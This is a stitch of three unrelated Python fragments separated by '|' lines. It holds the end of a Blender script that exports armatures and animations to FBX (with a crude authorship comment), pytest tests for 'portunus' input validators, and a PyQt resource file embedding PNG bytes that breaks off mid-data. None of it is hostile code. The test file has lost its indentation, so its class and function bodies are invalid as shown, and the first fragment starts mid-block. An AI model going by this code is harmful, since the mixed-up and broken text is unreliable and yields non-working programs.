        for mod in [mod for mod in obj.modifiers if mod.type == 'MIRROR']:
            obj.modifiers.remove(mod)
else:
    theCall = 'Only armature and animations exported'
fileName = nameWay + '_armaAnim.fbx'
objINCLUDE = {'ARMATURE','OTHER'}
bake = True
print(fileName,objINCLUDE,bake,nameWay)
print(nameWay) # test print to check that the variables are set
bpy.ops.export_scene.fbx(use_selection = True ,
path_mode = 'RELATIVE',
filepath = fileName ,
use_armature_deform_only = True,
add_leaf_bones = False,
object_types = objINCLUDE ,
axis_forward ='Z',
bake_anim = bake ,
bake_anim_use_all_bones = True)
ShowMessageBox(theCall)
#this piece of shit code is made by bento césar (@gostbento everywhere)
#with help from some guys from discord
#feel free to use it however you like
#if this breaks anything it is not my fault. be safe eat salad.
|
import os
from pathlib import Path
from portunus.validators import ImageValidator
from portunus.validators import IPValidator
from portunus.validators import NumberValidator
from portunus.validators import PortValidator
from portunus.validators import VolumeValidator
class Document:
def __init__(self, string):
self.text = string
def test_ip_validator():
IPValidator().validate(Document('192.168.1.1'))
def test_image_validator():
Path('test.img').touch()
ImageValidator().validate(Document('test.img'))
os.remove('test.img')
def test_number_validator():
NumberValidator().validate(Document('1'))
def test_port_validator():
PortValidator().validate(Document('1'))
def test_volume_validator():
Path('test').mkdir()
VolumeValidator().validate(Document('test'))
os.rmdir('test')
|
# -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.12.5)
#
# WARNING! All changes made in this file will be lost!
# from PyQt5 import QtCore
from silx.gui import qt as QtCore
qt_resource_data = b"\
\x00\x00\x19\x3d\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x32\x00\x00\x00\x32\x08\x06\x00\x00\x00\x1e\x3f\x88\xb1\
\x00\x00\x00\x06\x62\x4b\x47\x44\x00\xff\x00\xff\x00\xff\xa0\xbd\
\xa7\x93\x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x0b\x13\x00\x00\
\x0b\x13\x01\x00\x9a\x9c\x18\x00\x00\x00\x07\x74\x49\x4d\x45\x07\
\xe3\x01\x1e\x09\x34\x07\xfb\x3d\x97\x4b\x00\x00\x00\x1d\x69\x54\
\x58\x74\x43\x6f\x6d\x6d\x65\x6e\x74\x00\x00\x00\x00\x00\x43\x72\
\x65\x61\x74\x65\x64\x20\x77\x69\x74\x68\x20\x47\x49\x4d\x50\x64\
\x2e\x65\x07\x00\x00\x18\xa1\x49\x44\x41\x54\x68\xde\x35\x99\x67\
\x7c\x55\x55\xfa\xb6\xaf\xbd\x4f\x4b\x4e\x7a\x25\x09\x25\x09\x09\
\x1d\x44\x91\x26\x8a\xe8\x20\x4a\x71\x44\x01\xb1\x2b\x16\xb0\xcc\
\x60\xc1\xae\xef\x08\x63\x77\xfe\x3a\xa2\xa0\x88\x0c\x16\xac\x88\
\x0a\xa2\xa0\x02\x4a\x13\x51\x40\x40\x7a\x42\x4d\x02\x49\x48\x2f\
\x27\x27\xa7\xee\xfb\xfd\xb0\xb7\x9f\xf2\xcb\x29\xfb\xac\x67\xad\
\xfb\xb9\xcb\x7a\x8c\xbc\xe8\x70\xcd\xef\xdc\xc1\x75\x07\x80\x10\
\x3c\xd0\x7b\x04\x1b\xbb\xee\x66\xcf\xe6\x28\xae\x19\x49\x30\xa6\
\x83\xfa\x39\x30\xe3\x1c\xe8\x0d\x0c\xee\xf0\x32\xe3\xd9\x08\x2c\
\xc9\x83\x48\x36\x0c\x38\x08\xe3\xc5\xee\x3b\xe0\x9b\x42\xd8\x0d\
\x7c\xb0\x03\xd2\xbe\x06\xf7\x27\x5d\xe0\xf4\x28\x70\xf9\x20\xe5\
\x04\x47\x56\xed\xa0\x6a\x84\x49\x69\xd8\x22\x73\x85\x9b\xb4\xc7\
\xa6\x42\x73\x6f\x02\x23\x9b\x49\x78\x66\x09\xee\x6f\xc3\x84\xa3\
\x26\xbe\x7d\x97\x62\xb5\xe7\xa3\x59\x3f\x62\xae\xf6\xf3\xf6\xab\
\x11\xae\x5f\x94\x8f\x7b\xe5\x85\x7c\x78\xaf\x9f\xa9\x89\xaf\x52\
\x7b\xf6\x3a\x1a\xc9\x67\xe0\xb7\x43\xd9\xfe\xf7\xcf\x30\xbf\x6b\
\xde\xcf\xdf\x6a\x81\xb9\x40\x03\x6c\xe9\x7a\x88\x7f\x54\x47\x71\
\x7d\x0d\x9c\xee\x0f\x87\xa1\x79\x3f\x1c\xc7\xcf\x50\x60\xc6\xbf\
\x2c\xf8\x4f\x7f\x68\x1e\x00\x1d\xbd\xe0\x60\x0a\x08\xb2\x42\x70\
\x3e\xb0\x28\x0c\x49\x19\x10\x9e\x0a\x34\x74\x03\x6e\x82\xf8\xc3\
\xd0\xf2\x02\x7d\x2f\x99\xc1\xa8\x45\x09\x14\xd7\x42\x5a\x38\x0e\
\x1d\x6d\x44\x18\x88\xf7\xb7\x97\x30\x27\x7e\x47\xa8\xde\xc0\xb7\
\x29\x87\xd6\xa3\x23\xd0\xa9\x2c\x5c\x8f\x4d\xc0\x38\xe4\xa1\xf7\
\xeb\x29\xf0\x99\x8b\xe3\xea\x46\x60\xed\x83\x64\x86\xfb\x91\x1c\
\x4d\xa7\xa6\xc5\xa0\xe0\x64\x22\x93\xdf\x9a\x8b\x59\x19\x8c\x92\
\xb8\x0d\xc8\x81\x78\x14\xc2\x64\x91\x91\x68\xc2\x56\x17\xb8\xce\
\x62\x8d\x83\x0d\x37\xc1\x68\x82\xdc\x70\x77\x02\x2c\xcc\x05\xf2\
\xc1\x30\xe0\x9c\xcd\x1c\x7b\xb3\x8d\xde\xcf\xc2\xae\x3e\xb0\x0b\
\x88\xb9\xc1\x9d\x03\x81\x81\xc0\xd3\xfb\xc1\x3c\x03\xec\x43\x44\
\x11\xb3\x49\x9a\xf3\x24\x7c\x9c\x45\x6c\x8c\xa0\xcb\xef\xb8\xe8\
\x0a\x94\x63\x1a\x3e\x7c\x5d\x93\xd1\xf8\x16\xd2\x9a\x9b\x70\x75\
\xf6\x84\x68\x6f\x28\x3d\xc3\xd0\x4b\xcb\xc9\x8c\x2c\x62\xdf\xb2\
\x9d\xdc\xb2\xfb\x08\x1e\xef\x11\x16\x56\x26\x71\xdb\xb1\x5f\xf8\
\x57\x82\x87\x65\x56\x0e\x2c\xd9\xde\x45\x5a\x81\x74\x27\x6a\xac\
\x43\x17\xcb\xa3\xd8\xa3\x48\xd9\xf9\xd2\xe0\x2e\xda\x7d\x08\x0d\
\x94\x57\x7f\x84\x90\x0a\x3d\x52\x62\xa2\x94\x9a\x2c\x0d\x34\x54\
\x7f\x00\x5d\x27\xf4\x80\xd0\x0f\x42\xaf\x0b\xad\x15\xaa\x8d\xa3\
\xaf\x84\xaa\x02\x28\x7e\xef\x00\x89\xe7\xd5\x41\x95\x9a\x39\x25\
\x8b\x8d\xb2\xcc\x0f\x14\xfc\x0d\xc5\x6f\xf0\x49\xcc\x96\xd8\xa1\
\x28\x87\xa4\xbf\x77\x97\x26\xa3\x76\x36\xa9\x9c\x46\x9d\xa0\x42\
\xed\x4f\xa5\xc9\x1a\xd8\x4f\x07\x8d\x66\x3d\x52\x70\x4c\x4a\xfe\
\x51\x67\xb6\xf8\xb4\xe3\xdc\x1b\x34\x3f\x7f\xa9\x46\x0e\x8d\xeb\
\x92\xfc\x72\x99\x59\xde\x36\x82\x35\xc0\x71\xc8\xf8\x16\x26\x07\
\xa2\xb8\x3c\x1e\x20\x09\xc6\x9d\x65\x75\x29\xcc\xa9\x8f\x30\xe4\
\x66\xa0\x2a\x19\x22\x3e\x88\x87\x69\xb9\x5e\xfc\x38\x00\xae\x06\
\x1e\x04\x2e\x8c\xdb\xd0\x3a\x5f\x90\x6c\xc0\x84\x38\x74\xab\x07\
\x1e\x39\x88\xc6\xfe\x17\x3f\x2f\x93\xce\x12\x0c\xda\x31\xac\x3c\
\x12\x67\x8f\x20\x3e\x35\x0c\x1c\x00\x22\x18\xf8\xb0\x36\xf6\x83\
\xc4\x44\x7c\x74\x12\x25\x4e\xb1\xf9\x09\xc9\x2b\xf2\xe0\xf0\xcd\
\xf4\x30\x3b\x99\x68\xee\x87\x0b\xc6\x53\xf0\xa6\x20\xdf\x4b\x81\
\x37\x99\xe2\x16\x93\x7b\x3c\x07\x31\x17\x0e\xe9\x44\x61\x60\x00\
\x18\xc5\x30\x39\x0e\x74\x58\xd0\xe5\x04\xc1\x5b\xa1\xd5\x03\x33\
\x16\x00\x1b\x92\x41\x01\x48\x6d\xe5\xf4\xdc\x28\xf7\x3c\x0d\x1b\
\x80\x33\x67\xa0\xe8\x13\x48\xfe\x10\xfa\x76\x40\xb3\x01\x9e\xf5\
\x90\x38\x2a\x17\x96\x65\x63\x5a\x10\xfb\x5f\x13\xfc\xed\x23\xa0\
\x02\x38\x06\x04\x60\xdf\x38\x4c\xd3\x0b\x7d\x77\x03\xc2\x45\x3b\
\x66\xa0\x1f\x84\x3a\xf1\x70\x9c\x46\x92\x88\x64\x9c\x02\xab\x15\
\xd1\x04\xf1\x54\x0a\x4f\x0f\x85\x13\x82\xba\x22\x16\x1d\x9b\x42\
\x63\xd5\xc5\xb4\x9b\x01\xc2\xed\x43\xe1\x93\x76\xd4\xb1\x12\xe9\
\x69\x74\xa8\x19\x6d\xaf\x40\xba\x18\x59\x43\xd0\xd3\x21\x54\xbf\
\x18\xc9\x9f\x2a\xb9\xfc\x52\x8a\xa9\x8a\x15\x86\xae\x10\xfa\x57\
\x0c\x35\xcd\x46\x56\x4f\xa4\x81\x09\x52\x41\x9a\xa2\x8b\xd0\x71\
\xa1\xf8\xcd\x3e\x89\xc7\x25\x56\x4a\x3d\x67\x4b\xcb\x90\x36\x21\
\xdd\xe4\x96\x98\x22\xf1\x9e\xc4\x42\x89\xc9\xd2\xa7\x48\x2c\x95\
\x28\x73\xe0\x85\x2c\x5e\x56\x05\x96\xda\x78\x45\x4a\x19\xae\x06\
\xa4\x2a\x1a\x14\x4b\xb9\x43\xba\x20\x59\x61\xe3\x65\xfd\xb3\x58\
\x7a\xce\x1f\xd6\xdb\xee\x23\xda\x53\x34\x5f\x9c\xe8\x40\x0d\xfb\
\x90\x1e\x42\x7f\xb6\x23\x6b\x13\xd2\xf9\xa6\xc2\xff\x41\x95\xeb\
\x90\xd2\x3d\x92\xd1\x53\x2a\x71\xab\x6a\x13\xfa\x8f\xd0\xea\xb3\
\x28\x3a\x16\x89\xf3\x24\x6e\x92\xb8\x56\x62\x92\x42\x4f\xb8\x55\
\x65\x21\xdd\x80\xc4\x1d\x12\x1f\x49\xfc\x21\x99\x9f\x4b\x85\x57\
\x4b\x6b\x90\x26\xba\x25\xde\x95\xc5\x59\x89\x72\x69\x46\x0f\xa9\
\x70\x8c\xe2\x54\x2a\x4a\x48\x3a\xb7\x97\xc4\x1a\x95\x63\x29\x98\
\xfb\xb0\xe4\x9a\xa5\x83\x58\x6a\x64\x9b\xe4\x2f\x52\x83\xf7\x2b\
\xad\xa1\x55\xe3\x86\x48\x1f\x12\x50\xa5\x7b\xad\xf4\xb8\x21\x2a\
\x6a\xd1\xce\x2a\xa4\xb5\x68\xb3\xec\x82\xac\x6b\xd1\x9a\x18\xd2\
\x55\x48\xd9\x48\x69\x86\xaa\x3f\x44\xff\x16\x3a\xb5\xc6\x94\x92\
\xd2\x25\x86\x38\x8b\xbd\x47\x32\x6e\x56\xe4\xca\x62\x9d\x6a\x41\
\x9b\x84\x82\x3f\x20\x25\x96\x38\xef\x7f\x26\xb1\x4c\xe2\x5b\x29\
\xfd\x46\x69\x2b\xd2\x85\xa5\x12\x6f\x49\x6c\x96\x78\x43\x7a\xd8\
\x23\xf1\xaa\xc4\x26\x69\xd8\xc5\x12\x1f\xa9\x91\x98\xe4\xba\x5d\
\x71\xf6\xa9\x81\xb0\xc2\x5c\x2b\xb9\x6e\xd1\x7a\xc2\xba\x17\xe9\
\x3b\x62\x6a\xf0\xbd\x22\x0d\xf5\xab\x82\x45\x22\xb2\x1b\x55\xef\
\x40\x91\x25\xe8\xcb\x38\x52\x11\xd2\x14\xa4\x9b\x4c\xc9\x6b\x4a\
\x49\x1e\x55\x2c\x43\x5f\x06\x91\xee\x43\x72\x17\x4a\xfc\x4d\x62\
\x92\x64\x9e\x27\x2b\xbb\x50\x81\x95\xe8\x47\x0b\xad\x11\xfa\x46\
\xe8\x90\x90\x16\x20\x65\xa4\x49\xdc\xee\x2c\xf2\x6b\x89\xef\xa4\
\xec\xcb\xa5\xf7\x0d\xa9\xa0\xbf\xc4\xff\x24\xf6\x4b\xbd\x2f\x95\
\xf2\x87\x4b\xfc\x2c\x15\x3d\x28\x31\x47\x61\x02\x12\x0f\xa9\x93\
\x5a\x9d\xa6\x46\x32\x27\xa9\x9a\x4a\x7d\x8d\xb4\x84\x98\x54\x38\
\x5e\xe2\x62\x45\xf8\x42\xaf\x13\x93\xa1\xc7\x11\xdd\x40\xa3\x20\
\xbe\x07\xdc\x33\x93\xc0\x17\x81\xd0\x00\xf0\x1d\x22\xb8\x3c\x82\
\xd5\x08\xc9\xff\x01\xca\x52\x80\x9e\xe0\xe9\xc0\xba\xfe\x34\x07\
\x66\x84\x38\x3a\x0a\x48\x80\x0e\x5b\x5d\x70\x01\x05\x40\x7e\x0c\
\x52\x6a\xc0\xfc\xb7\x1b\x3e\x1a\x01\x91\x99\x40\x37\xa0\x0e\x92\
\x0e\xc3\x9d\xcf\xc3\xfb\xf9\xd0\xfe\x36\x10\x83\x5e\xf7\xc3\xd1\
\x6f\x80\x0e\x2c\x52\x30\xe9\x0e\xfc\x8f\x0a\x9e\x24\x42\x23\x99\
\x74\x52\x46\x37\x06\xf3\x13\x49\x7c\x03\xc6\x25\x9c\xd2\x60\xd6\
\x53\x42\x12\x60\x54\xfd\x82\xaa\xfa\xc2\xd6\x4c\x98\xbd\x15\x12\
\xe7\xb9\xc0\x63\x41\xc8\x84\xac\x38\x24\x00\xbf\x00\x5d\x81\x01\
\x06\x8d\x17\x19\x6c\xb8\xdc\xe2\x54\x81\xfd\x52\x9f\xd3\x90\x17\
\x86\xf6\x1c\xd8\x92\x0a\x85\xc0\xc5\xe5\xe0\x8d\x81\x2b\x05\x94\
\x01\x91\xd3\x90\xb8\x20\x17\xde\xeb\x0f\xa1\xa1\xc0\x40\xe0\x0f\
\x18\xbe\x1c\xf6\x0f\x86\xce\x47\x81\x1a\x9b\x3a\x69\x02\xb6\x42\
\xca\x6e\x08\x05\x89\x45\xd7\x53\x8b\x81\x17\x93\x6c\x7e\xc0\x74\
\x7d\x4c\x34\x3e\x8f\x43\x14\x73\x12\x17\xa9\x40\x42\xfa\x19\x8c\
\x52\x19\xca\x05\xba\x20\x2e\x06\xee\x3a\x0c\xfe\x76\x30\xbf\x04\
\x3e\x07\x32\x80\xcb\xa0\xf9\x2a\xd8\x71\x11\xb4\x87\xa1\xdf\x09\
\x83\x82\xed\x90\xb1\x0a\xd8\x9e\x08\xa6\x05\xe3\xc3\xfc\xf4\xb1\
\x18\x14\x85\xdc\x1b\x80\x03\x06\x74\x26\xa2\xe2\x04\x3a\x1f\x69\
\xc7\xec\x1b\xc3\xdd\x28\x5c\x8b\x4d\x8c\xd5\xbd\xa1\xf1\x6a\xa0\
\x18\x68\x05\xb2\x80\x1e\xc0\x66\x48\xff\x11\x46\xee\x04\x3f\xf0\
\xdd\xe5\x28\xf2\x36\x27\x29\xc1\x02\x0a\x68\x04\xc2\xb4\x51\xc0\
\x29\xa0\xbb\x51\x49\x81\xf1\x14\x46\x49\x03\xc6\x45\x42\x5d\x81\
\x66\xc0\x04\x6e\x06\xa6\x6e\x80\x84\xc7\x9d\xcd\x99\x0a\xca\x85\
\x78\x1d\xb8\xd7\x02\x95\x69\xd0\x91\xe5\x54\x98\x68\x0b\x27\x89\
\x58\x0f\xfc\xc0\xb6\xf9\x21\x2e\x3a\x08\xc6\x38\x2f\xd4\x74\x07\
\x86\x01\x17\x01\x67\xc0\xa8\x85\x9e\xab\x88\xdd\xd6\x8c\xbb\x05\
\xd8\xe9\x81\x5f\xde\x06\x75\x01\x0a\xc1\x58\x05\xd7\x3e\x0b\x97\
\xc6\xed\x47\xee\x02\xfe\x04\x36\x4f\x27\xca\x62\x56\x92\x4e\x77\
\x1b\xd8\xa4\xb2\x01\x1f\x75\x98\xf9\x8f\x42\xcd\x1c\x5a\xcc\xe1\
\xb8\x83\x98\x44\xb0\x68\x02\x7c\xc0\x1e\xe0\x9a\x74\xa0\x08\xa8\
\x05\x16\x79\x30\x82\x83\x70\xd3\x08\xc9\x95\xd0\x91\xe8\x14\x60\
\x02\xe9\xf6\x8e\xfa\x0e\x50\x7b\x67\x88\x46\x20\x94\x05\x89\x7d\
\xa3\x50\xd3\xe2\x7c\xae\x0b\x60\x80\x4a\xe0\xf8\x60\xdc\xcf\x54\
\xd9\x4d\x45\x1c\xf8\xc2\xfe\x21\xcf\x09\x98\xf9\x13\x5c\xe9\x3c\
\x36\xd9\xf9\xea\x70\xc0\xb7\x06\xf7\xba\xc5\x0c\xe6\x01\xd2\x71\
\x93\x42\x94\x44\x0e\x63\x31\x91\xfa\x9a\x67\x68\xe7\x26\x16\x58\
\xc9\xb8\x5d\xce\x77\xe5\x34\xea\x21\x60\x7b\x29\x8c\xbd\x0c\xc8\
\x05\xd6\x47\xa1\xf2\x28\x14\xc3\xe9\x3b\x0c\x62\x45\xb5\xc4\x32\
\x6a\x09\xf9\x21\xec\x03\x9f\x0f\x3c\xfd\xa0\xc6\x03\x41\xa0\x3c\
\x0f\x0a\xbf\x12\xe9\x5b\x1a\x61\xc3\x17\xf0\xe7\xaf\xd0\x2c\xa8\
\x2e\x80\xa6\x49\xc0\x14\xec\x4f\x36\x00\x27\x81\xef\x60\x76\x0d\
\xfc\xd3\x81\x45\x14\x38\x88\xcd\x1e\x06\xe0\x8b\x62\x10\x26\x8f\
\x18\xb5\x24\xd0\x8c\x41\x3a\xb3\x39\x0c\x84\x28\xa1\x37\x70\x15\
\xe0\x6e\xc0\xc4\x87\x45\xcc\x39\x91\x62\x20\x25\xe8\x3c\x34\x05\
\x88\x79\xc0\xf4\xc2\xe8\x36\x22\xb7\x59\x54\x03\x1d\x06\xb8\xbd\
\xa0\x64\x68\xf4\xd8\x20\xf3\x3b\x48\xf7\x01\x4d\x09\x10\xbd\x10\
\x32\x87\x05\x09\xb9\xcb\xf0\x76\x82\xe7\x87\x72\x98\xb7\x1b\x6a\
\x9f\x71\x8e\x7b\xa7\x8d\x9d\x8b\x6a\x60\x2c\xd0\xe2\xf4\x7b\xb2\
\x53\x40\xa7\x43\x83\x56\x04\xa8\xc7\xcf\x59\xb2\x30\x38\x8b\x9f\
\x6c\x4e\x72\x3e\x71\x92\x8c\xf7\x71\xa9\x1b\x85\x0c\xc4\x5d\x48\
\x0c\x37\x50\xee\xb4\xdd\x2c\x60\xf8\x77\xc0\x07\xb6\x25\x22\x16\
\xb5\x51\xb0\xb4\x88\x9e\x1f\xb6\xd3\xd3\x48\x00\xb7\x0f\x92\x5b\
\xe1\xfc\x5a\x62\x33\xe1\xf4\x14\xfb\x24\x3d\x40\xe9\x72\x70\xcf\
\x4d\x83\x53\xbd\x21\x9e\x47\x12\x9d\xe0\x09\x40\x34\x19\x62\xfd\
\x9c\x9e\x6a\x06\x32\x81\xc1\x50\x57\x85\x7a\x74\x80\x1b\x8c\x6c\
\xe7\xad\x0c\xc0\xed\xc0\xab\xdc\x07\x64\xe0\x61\x0f\xd9\xe4\x13\
\xe7\x02\xdc\x34\x92\x4a\x10\x94\x0f\x74\xe0\x36\x77\x61\xf8\x94\
\xa3\xb1\xd4\x13\x02\xfa\x02\xcf\x34\x42\x97\xbb\x80\xad\x29\x30\
\xb9\x9d\xce\xfb\x21\xbc\x07\xd2\x3f\x32\xa0\x5c\x50\xef\x03\x2b\
\x05\xa2\x3d\xed\x10\x43\x0b\x3c\xb7\x8d\xdf\x9f\x86\xf4\x3a\xe8\
\x33\xd5\x80\x6d\x53\x81\xee\x0e\x36\xdd\x0e\x5e\x92\x9d\xf3\x8e\
\xd9\xcd\x4f\x9e\xa3\x38\x1f\xc3\xa2\xb7\xd1\x35\x60\xec\x75\x5a\
\x27\xe4\x6c\x62\x05\x30\x6f\x18\x58\xf7\x01\xa3\x09\x90\x88\x89\
\x9f\x1d\x24\x53\x80\x9b\x16\x44\x2a\x06\xed\x80\x2b\x6f\x5e\x74\
\xde\xb9\x58\xcc\x04\xae\x6b\x83\xbc\x23\xce\xf3\x7f\x8b\xc0\x2e\
\x2f\x9e\xb4\x38\x5b\x67\xc0\xaf\x77\x43\xcb\x3f\x40\x17\xc5\x49\
\x09\x86\x31\xab\x23\x10\x8a\x80\x51\x8b\x75\x63\x3b\x4d\x43\x20\
\x7b\x0f\x24\xaf\x32\xe0\xac\x1b\x38\x0d\xb4\x81\xcf\x05\x39\x35\
\x30\xf8\x28\xf4\xf9\x12\x9a\x16\x40\xc4\x0b\x1a\x0d\x94\xd8\x05\
\x46\x57\x60\xf4\xb4\x20\xd5\xd6\x4b\x92\x81\x6d\xc0\xd2\x12\x08\
\x3c\xe7\x54\xe6\xc3\xcd\x29\x22\x18\x94\xf2\x3d\x09\xf8\x68\x24\
\x15\xe1\xe6\x00\x60\x3c\x2e\x34\x06\x98\xb0\xd7\xc1\xe9\x61\x60\
\x08\x34\x64\x40\xd6\x63\x60\xec\x02\xfc\x49\x58\x53\x23\xec\xb8\
\x39\xca\xee\x7e\x10\x31\xe1\xbc\x6a\x28\xfd\x15\x92\xc3\x70\x70\
\x3a\x54\x7b\xa0\x67\x08\x06\x6c\x00\xef\xcf\x6e\x62\xbd\x5d\x44\
\x0b\xc3\x44\x4a\x21\xad\x19\x8c\x9f\xbc\xf0\x4e\x1a\x54\x5e\x65\
\x0b\x13\x5d\x9c\x86\xef\x07\xde\xb7\x20\xfb\x10\x3c\xbc\x0d\x06\
\xc7\x61\x25\xb0\x22\x07\xea\x9e\xb0\x29\xc8\xa8\x05\x8d\x27\x48\
\x29\x1e\xca\x70\x73\x14\xa3\xcf\xab\xd0\xd2\x0b\xac\x54\x1a\x1a\
\x5e\xc2\x68\x8e\xa3\x0a\x13\x06\xaf\xb7\xc5\x96\xdf\x6d\x24\xd4\
\x7f\x0c\x1b\x7d\x30\xfd\x59\xe0\x95\x3c\x9b\x3e\x53\x92\x60\xc8\
\x4e\x8e\x7e\xda\xcc\xa6\x02\x1b\x30\xa5\x0e\xc1\xa4\x01\xed\x40\
\x7f\xc0\x72\x40\x97\xb2\x1d\xdc\x73\xbd\x18\xdb\x87\x43\x60\x18\
\xf6\xf5\x45\xa1\x73\x5a\x47\x1c\x85\x1f\x07\xb8\x11\x11\x0c\x63\
\x09\x5c\xf1\x5f\xd8\x52\x02\xc1\x73\x81\x09\x58\x4c\xc4\x34\x1f\
\x02\xb7\x0b\x2b\xf2\x10\x15\xf4\x27\x07\x51\xe5\x3a\x4b\xbf\xd4\
\x67\x20\xb0\x0d\x3c\x60\xe8\x35\xd4\x36\x13\x52\xd7\x39\xc7\x9a\
\x0a\xbc\x66\x6f\xc4\xe6\x75\xb0\x3c\x03\x1e\x5d\x09\xc5\x37\x26\
\x43\xa8\x14\xe8\x05\xae\xc3\x30\xb1\x8c\xda\xd7\xa2\xfc\xd6\xcb\
\xee\xcf\x7c\xa7\x80\x11\x0d\x90\xf5\x36\xf0\x41\x3e\x9c\xfc\xbb\
\xb3\x78\xb7\xf3\x37\x08\x29\xef\x40\x7b\x8a\x53\x72\x7f\xe0\x38\
\xe2\x7a\x0c\x42\xb6\xbe\xf8\x1f\x86\x60\x0c\xb8\x11\xc8\x43\x0c\
\x25\x46\x04\x8f\x71\x2d\xf4\xad\x27\x7c\xf8\x67\x5a\xc8\x23\x86\
\xa8\xc5\xc0\xed\xde\xce\xe0\x41\xf7\x81\x3e\x46\x65\x01\x14\x38\
\x81\x74\x1c\x6d\x17\xea\xfc\x1a\x29\x0d\x69\x80\x5b\x07\x4e\xa1\
\xfb\x85\xaa\xca\x90\xce\xc3\x0e\x58\x8c\x95\x98\x29\x65\x75\x51\
\x60\x17\xfa\x40\x68\x95\x50\x5d\x25\xd2\x39\xa9\x12\xe3\x24\x1e\
\x96\x78\x59\xe2\xff\x6c\x07\x3c\x7c\xac\xf4\x32\x52\xde\x60\x89\
\x47\x25\x5e\x93\xf2\xc6\x49\xfe\xcb\x24\x96\x4b\x3c\x23\xf1\x93\
\x94\x76\x8f\x64\x0e\x74\x2c\xfe\xcb\x12\xdf\xe8\x18\x52\x9c\x46\
\x29\x65\x9c\x54\x92\x24\xb1\x54\xad\x9c\x50\x35\x31\xad\x45\x6a\
\x20\x2e\x93\xad\xd0\x1e\x87\xa4\xa3\xf6\x49\xe4\xd4\xc1\x67\x57\
\x02\x8f\x03\xc7\x0b\x18\xd0\x2f\x9f\xe9\x47\xe0\xa5\xde\xf0\xc7\
\x3a\x60\x4c\xf8\x2f\xb5\x80\x40\x1b\x49\x6b\xa1\xaf\x20\x2f\x0a\
\x39\xb7\x02\xfb\x66\x01\xf7\x39\xb2\x1c\x85\xe4\x23\xe8\xa3\x65\
\xf0\xf0\x4f\xf0\xc2\x30\xa8\x9d\x65\xbf\x97\xbf\x0e\xd2\x76\x42\
\xf0\x5e\x70\x1d\x87\x82\x57\x6c\x80\x06\x93\x20\x2b\x44\x8c\xbe\
\x88\x5c\x70\x2f\x24\x9d\x3a\x76\x91\x49\x53\xfb\x67\x50\x97\x06\
\xa3\xee\x23\xd5\x5c\x00\xec\xe0\x24\xb0\x18\x13\x53\x33\xe1\x50\
\x2a\xc4\xdb\xed\x93\xef\xb1\x11\x2a\x3c\xd0\x7e\x1d\x30\xa8\x0a\
\x3a\xdd\x8c\x98\xe5\x61\x58\x1b\x7c\x92\x0d\xdf\x7f\x19\x87\x3b\
\x37\x41\xd6\xef\x90\x17\xc1\x2a\xb6\x59\xb2\x7b\x3b\x70\xc8\x07\
\xc6\x01\x60\x37\xa4\x7d\x41\x7c\xee\xeb\xb4\xfc\xb1\x14\xce\xc6\
\x61\x76\x16\xb4\x5f\x64\xab\x6c\xea\x7a\x98\xb3\x01\x4e\xcc\xb1\
\xbb\xac\x74\x83\xcd\x54\x64\x43\xef\x03\x70\xfe\x59\xe2\xb4\x12\
\x66\x02\x8c\xf8\x89\xac\xcc\x7b\x71\x11\x63\x1f\x59\xd4\xb4\x6f\
\x87\xce\x0c\x78\xe0\x1d\xba\x78\xdf\x60\x32\x27\xed\xaf\xea\x2c\
\x7a\x44\xa8\x79\x0b\xd2\x6c\xa4\xbb\xd1\x67\x31\xb4\x40\x48\xaf\
\x21\xf5\x44\x32\x0b\xa5\x9b\x4c\xad\xb0\xd0\xb3\x42\x2b\x85\x1a\
\xf6\x20\xbd\x88\xda\x8f\xa1\x4f\x84\x76\x75\x22\xcd\x44\x1a\x8d\
\x74\x77\x92\x6a\x8e\xd8\x01\xcb\x9a\xed\x95\xdc\xa5\x12\xb3\x24\
\x5e\xb7\x21\xf7\x86\x5b\x9a\xd4\xdd\xce\xf4\xec\x95\xa6\xb9\xa5\
\xbc\xa1\xb2\x08\x48\x7d\xc7\x4b\xf3\x3d\x92\xb1\x51\x41\x24\x15\
\x0c\x94\x6e\xf1\xaa\xd1\xa8\xd3\x7e\xa4\xbd\xc8\x4e\x9b\xf7\x64\
\x49\x77\x23\x0d\xef\xa3\x33\x54\xca\x0c\xb7\x9b\x04\x01\xcb\xeb\
\x58\x9f\x6f\x0d\x4a\xf6\xc0\x0a\xa0\x75\xa2\x23\xc4\x78\xe1\x93\
\x3c\xa6\xfd\xdb\x66\xa9\xe3\xc0\x67\xe7\xc2\x2f\x4f\xc2\xbe\x12\
\x9b\x1f\x9a\x12\xa0\x7a\x11\x34\xac\x87\x23\xef\x74\xe0\xcd\x84\
\x7e\xd7\x27\x63\x2c\x98\x06\xb1\x09\xf6\xce\x1b\xf5\xf0\xc8\x12\
\x08\xc5\x61\xcd\x9d\x0e\xe7\x6d\x86\x09\x31\xa8\x1d\x83\x41\x10\
\xda\xf2\x6c\x37\x61\x96\x11\x02\x38\x3b\x01\x3c\x11\xd2\x53\xbe\
\xc7\x72\x7e\x7b\x3b\x13\x89\xbf\xf3\x03\x54\xe6\x41\xef\x32\x0a\
\x86\xf5\xc0\xd4\x29\x11\x00\x1a\x8a\x80\x30\xd0\x2c\xce\x59\x0a\
\xe7\x00\x5f\xf4\x05\xa6\x01\x66\x9d\xed\xa6\xde\x82\x69\x9f\xd8\
\x26\xd3\x72\xf4\xb9\xcc\x11\x63\x0b\xd8\xef\x82\x3d\x3e\xe8\xd2\
\x00\x99\x17\x16\xc1\xf2\xa9\xf6\x26\x50\x0f\xac\x84\xe9\x6f\xd0\
\xf1\x58\x1b\x7c\x9b\xe1\x38\xe7\x3a\xb8\xf8\xbf\x50\x93\xe8\x10\
\x76\x13\x24\xc8\x76\x2f\x29\x7b\xc8\xa0\x02\xe2\xd7\xc3\x0f\x17\
\x62\x5e\x3e\x8b\x62\x3e\xa0\x17\x10\xc1\xe4\x20\x43\x09\xad\xdb\
\x08\xcd\x26\x8c\x01\x33\xa1\x4c\x8c\x05\x76\x25\x3a\x8a\x5e\x0c\
\xbe\xcd\xf0\x78\x15\x6c\x04\x0e\xdd\x08\x64\x05\x6c\xb5\x68\xea\
\x81\xe7\x49\x17\x33\xd7\xc3\x20\xcb\x76\xcc\x3e\xa7\x10\x0f\x10\
\x01\x86\x1e\x87\x8c\xcb\xdc\x70\xf4\xaf\xe0\xeb\x05\x1a\xe1\xf2\
\xfd\xe8\xe5\x0e\xfc\x2f\x02\xdb\x6f\x03\xae\xb0\xe9\x76\x64\x3d\
